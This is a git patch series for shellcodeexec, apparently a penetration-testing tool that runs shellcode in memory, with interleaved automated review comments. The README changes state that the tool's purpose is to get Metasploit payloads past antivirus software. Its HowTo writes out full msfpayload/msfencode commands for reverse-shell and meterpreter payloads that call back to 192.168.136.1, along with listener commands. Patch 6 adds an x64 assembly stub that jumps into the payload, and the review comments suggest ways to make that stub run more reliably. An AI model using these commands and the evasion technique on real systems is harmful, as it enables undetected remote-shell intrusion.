From 6798ad80fcabeec0dd034af5b7149d0dd7307bd8 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 27 Jun 2012 01:12:31 +0200 Subject: [PATCH 1/6] Update master --- README | 120 ++++++++++++--------------------------------------------- 1 file changed, 24 insertions(+), 96 deletions(-) diff --git a/README b/README index 85620c3..69b1554 100755 --- a/README +++ b/README 
@@ -1,127 +1,55 @@ -= Short description = +# Short description shellcodeexec is a small script to execute in memory a sequence of opcodes. +## Background -= Background = +Most of the shellcode launchers out there, including proof of concepts part of many "security" books, detail how to allocate a memory page as readable/writable/executable on POSIX systems, copy over your shellcode and execute it. This works just fine. However, it is limited to POSIX, does not necessarily consider 64-bit architecture and Windows systems. -Most of the shellcode launchers out there, including proof of concepts -part of many "security" books, detail how to allocate a memory page as -readable/writable/executable on POSIX systems, copy over your shellcode -and execute it. This works just fine. However, it is limited to POSIX, -does not necessarily consider 64-bit architecture and Windows systems. +## Description +This script and the relevant project files (Makefile and Visual Studio files) allow you to compile the tool once then run your shellcode across different architectures and operating systems. -= Description = - -This script and the relevant project files (Makefile and Visual Studio -files) allow you to compile the tool once then run your shellcode across -different architectures and operating systems. - -Moreover, it solves a common real world issue: the target system's anti -virus software blocking a Metasploit-generated payload stager (either EXE -of ELF). Take for instance the following command line: +Moreover, it solves a common real world issue: the target system's anti virus software blocking a Metasploit-generated payload stager (either EXE of ELF). 
Take for instance the following command line: $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe -This generates a Metasploit payload stager, payload.exe, that as soon as -it lands on the AV-protected target system is recognized as malicious and -potentially blocked (depending on the on-access scan settings) by many -anti virus products. At the time of writing this text, 21 out 41 anti -viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it -multiple times with msfencode, less AV softwares detect it, still a lot. +This generates a Metasploit payload stager, payload.exe, that as soon as it lands on the AV-protected target system is recognized as malicious and potentially blocked (depending on the on-access scan settings) by many anti virus products. At the time of writing this text, 21 out 41 anti viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it multiple times with msfencode, less AV softwares detect it, still a lot. -I have been surfing the Net and found some interesting tutorials and -guides about packing, compressing, obfuscating and applying IDA-foo to -portable executables et similar in order to narrow down the number of AV -products that can detect it as a malicious file. This is all interesting, -but does not stop few hard-to-die anti viruses to detect your backdoor. +I have been surfing the Net and found some interesting tutorials and guides about packing, compressing, obfuscating and applying IDA-foo to portable executables et similar in order to narrow down the number of AV products that can detect it as a malicious file. This is all interesting, but does not stop few hard-to-die anti viruses to detect your backdoor. -So the question is, how cool would it be to have a final solution to avoid -all this hassle? This is exactly where this tool comes into play! 
+So the question is, how cool would it be to have a final solution to avoid all this hassle? This is exactly where this tool comes into play! - -= Features = +## Features shellcodeexec: * Can be compiled and works on POSIX (Linux/Unices) and Windows systems. - * Can be compiled and works on 32-bit and 64-bit architectures. - * As far as I know, no AV detect it as malicious. +* Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx - Readable Writable and eXecutable. +* It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode. +* Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours. -* Works in DEP/NX-enabled environments: it allocates the memory page where - it stores the shellcode as +rwx - Readable Writable and eXecutable. - -* It supports alphanumeric encoded payloads: you can pipe your binary-encoded - shellcode (generated for instance with Metasploit's msfpayload) to - Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the - BufferRegister variable to EAX registry where the address in memory of - the shellcode will be stored, to avoid get_pc() binary stub to be - prepended to the shellcode. - -* Spawns a new thread where the shellcode is executed in a structure - exception handler (SEH) so that if you wrap shellcodeexec into your own - executable, it avoids the whole process to crash in case of unexpected - behaviours. - - -= HowTo = - -1. 
Generate a Metasploit shellcode and encode it with the alphanumeric - encoder. For example for a Linux target: +## HowTo +1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target: $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX - - Or for a Windows target: - +Or for a Windows target: $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX - - -2. Execute the Metasploit multi/handler listener on your machine. For - example for a Linux target: - +2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target: $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E - - Or for a Windows target: - +Or for a Windows target: $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E - - -3. Execute the alphanumeric-encoded shellcode with this tool. For example - on the Linux target: - +3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target: $ ./shellcodeexec - - Or, on the Windows target: - +Or, on the Windows target: C:\WINDOWS\Temp>shellcodeexec.exe +## License -= License = - -This source code is free software; you can redistribute it and/or -modify it under the terms of the GNU Lesser General Public -License as published by the Free Software Foundation; either -version 2.1 of the License, or (at your option) any later version. - -This library is distributed in the hope that it will be useful, -but WITHOUT ANY WARRANTY; without even the implied warranty of -MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -Lesser General Public License for more details. 
- -You should have received a copy of the GNU Lesser General Public -License along with this library; if not, write to the Free Software -Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - - -= Author = - -Bernardo Damele A. G. - - -= Homepage = +This source code is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. -https://github.com/inquisb/shellcodeexec +This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. +You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA \ No newline at end of file From 6edfa350eaad57d2e65eaf53695fb0b898bffd03 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 27 Jun 2012 00:16:27 +0100 Subject: [PATCH 2/6] Renamed README file --- README => README.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename README => README.md (100%) diff --git a/README b/README.md similarity index 100% rename from README rename to README.md From d3f3a3f5f489c642f9cc292f63e4c8bc1ebc40c9 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 27 Jun 2012 00:17:34 +0100 Subject: [PATCH 3/6] minor adjustments to README --- README.md | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 69b1554..2b6cc7f 100755 --- a/README.md +++ b/README.md 
@@ -34,11 +34,16 @@ shellcodeexec: ## HowTo 1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target: - $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX + $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX + Or for a Windows target: $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX + 2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target: - $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E +``` +$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E +``` + Or for a Windows target: $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E 3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target: 
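Review bot: the first hunk of PATCH 3/6 fences only the Linux `msfcli` listener command in three-backtick fences while the three neighbouring `$ msfpayload` / `$ msfcli` commands stay as indented text, so the HowTo renders half fenced and half as indented code; fence all four the same way in one change rather than leaving it to a follow-up. The `-`/`+` pair for the Linux `msfpayload` command reads identically, so that part of the hunk is a whitespace-only change and is noise in the diff.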
@@ -52,4 +57,4 @@ This source code is free software; you can redistribute it and/or modify it unde This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. -You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA \ No newline at end of file +You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA From be434944ba8b31dc1a7bc567cf713ca730272970 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 27 Jun 2012 00:19:09 +0100 Subject: [PATCH 4/6] minor adjustments to README --- README.md | 23 +++++++++++++++-------- 1 file changed, 15 insertions(+), 8 deletions(-) diff --git a/README.md b/README.md index 2b6cc7f..bd6c7a6 100755 --- a/README.md +++ b/README.md 
@@ -34,22 +34,29 @@ shellcodeexec: ## HowTo 1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target: - $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX - +``` +$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX +``` Or for a Windows target: - $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX - +``` +$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX +``` 2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target: ``` $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E ``` - Or for a Windows target: - $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E +``` +$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E +``` 3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target: - $ ./shellcodeexec +``` +$ ./shellcodeexec +``` Or, on the Windows target: - C:\WINDOWS\Temp>shellcodeexec.exe +``` +C:\WINDOWS\Temp>shellcodeexec.exe +``` ## License From cb54310537547e3a0df3565594258044dbe23586 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 27 Jun 2012 00:23:14 +0100 Subject: [PATCH 5/6] minor adjustments to README --- README.md | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index bd6c7a6..bc77787 100755 --- a/README.md +++ b/README.md 
@@ -1,13 +1,11 @@ -# Short description - -shellcodeexec is a small script to execute in memory a sequence of opcodes. - ## Background Most of the shellcode launchers out there, including proof of concepts part of many "security" books, detail how to allocate a memory page as readable/writable/executable on POSIX systems, copy over your shellcode and execute it. This works just fine. However, it is limited to POSIX, does not necessarily consider 64-bit architecture and Windows systems. ## Description +shellcodeexec is an open source script to execute in memory a sequence of opcodes. + This script and the relevant project files (Makefile and Visual Studio files) allow you to compile the tool once then run your shellcode across different architectures and operating systems. Moreover, it solves a common real world issue: the target system's anti virus software blocking a Metasploit-generated payload stager (either EXE of ELF). Take for instance the following command line: From b61598d7f2b74547558998fd4c4f7011d63f0808 Mon Sep 17 00:00:00 2001 From: Vlatko Kosturjak Date: Sun, 22 Jun 2014 20:36:54 +0200 Subject: [PATCH 6/6] Fix for x64 build --- windows/shellcodeexec/Makefile.v64 | 8 ++++++++ windows/shellcodeexec/__exec_payload.asm | 7 +++++++ 2 files changed, 15 insertions(+) create mode 100644 windows/shellcodeexec/Makefile.v64 create mode 100644 windows/shellcodeexec/__exec_payload.asm diff --git a/windows/shellcodeexec/Makefile.v64 b/windows/shellcodeexec/Makefile.v64 new file mode 100644 index 0000000..50edd90 --- /dev/null +++ b/windows/shellcodeexec/Makefile.v64 @@ -0,0 +1,8 @@ +shellcodeexecvc64.exe: shellcodeexec.obj __exec_payload.obj + link shellcodeexec.obj __exec_payload.obj + +shellcodeexec.obj: shellcodeexec.c + cl shellcodeexec.c /Os /TC /c + +__exec_payload.obj: __exec_payload.asm + ml64 __exec_payload.asm /c diff --git a/windows/shellcodeexec/__exec_payload.asm b/windows/shellcodeexec/__exec_payload.asm new file mode 100644 index 0000000..167e0ad 
--- /dev/null +++ b/windows/shellcodeexec/__exec_payload.asm @@ -0,0 +1,7 @@ +.CODE +__exec_payload PROC x:QWORD + mov rax, x + call QWORD PTR[rax] + ret +__exec_payload ENDP +END
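Review bot: the README hunk in PATCH 1/6 deletes the `= Author =` / `Bernardo Damele A. G.` and `= Homepage =` / `https://github.com/inquisb/shellcodeexec` sections without a markdown replacement, so the rewritten README no longer names the author or the project URL; carry them over as `## Author` and `## Homepage` to match the new heading style. Since the paragraphs are being re-flowed anyway, the typos they carry could go in the same pass: `either EXE of ELF` (`or`), `21 out 41` (`21 out of 41`), `EAX registry` (`EAX register`) and `structure exception handler` (`structured exception handler`). The new file also ends with `\ No newline at end of file`, which a later patch in this series has to correct separately.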
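Review bot: in the HowTo hunk of PATCH 4/6 the new three-backtick fences sit at column 0 directly between the numbered items, so each of `1.`, `2.` and `3.` is broken out of the ordered list instead of nested under it; indent the fences and the `Or for a Windows target:` lines under their item, and consider tagging the fences with a language such as `sh` so the commands get highlighted.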
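Review bot: in `Makefile.v64` (PATCH 6/6) the target is named `shellcodeexecvc64.exe` but the recipe `link shellcodeexec.obj __exec_payload.obj` passes no `/OUT:` option, so the linker names the output after the first object (`shellcodeexec.exe`); the declared target is never produced and the rule re-runs on every build. Use `link /OUT:shellcodeexecvc64.exe shellcodeexec.obj __exec_payload.obj`. A comment that this Makefile must be run from an x64 Visual Studio command prompt, where `cl` and `ml64` target x64, would also help, since the commit message only says "Fix for x64 build".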
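Review bot: `__exec_payload` in `__exec_payload.asm` (PATCH 6/6) hands control to the payload with `call QWORD PTR[rax]` without reserving the 32-byte shadow space the Windows x64 calling convention requires the caller to provide, and nothing visible guarantees `rsp` is 16-byte aligned at the `call`; reserve the space before the call and release it after (`sub rsp, 28h` / `add rsp, 28h`, or whatever amount keeps `rsp` 16-aligned given the prologue ml64 emits for the `x:QWORD` parameter) and say so in a `;` comment, otherwise a payload that calls Win32 APIs or uses aligned SSE moves can fault. Separately, `call QWORD PTR[rax]` calls through the value stored at `x`, so the C side must pass the address of the variable that holds the shellcode pointer rather than the shellcode pointer itself; `shellcodeexec.c` is not part of this patch, so please state that contract in a comment at the top of the procedure.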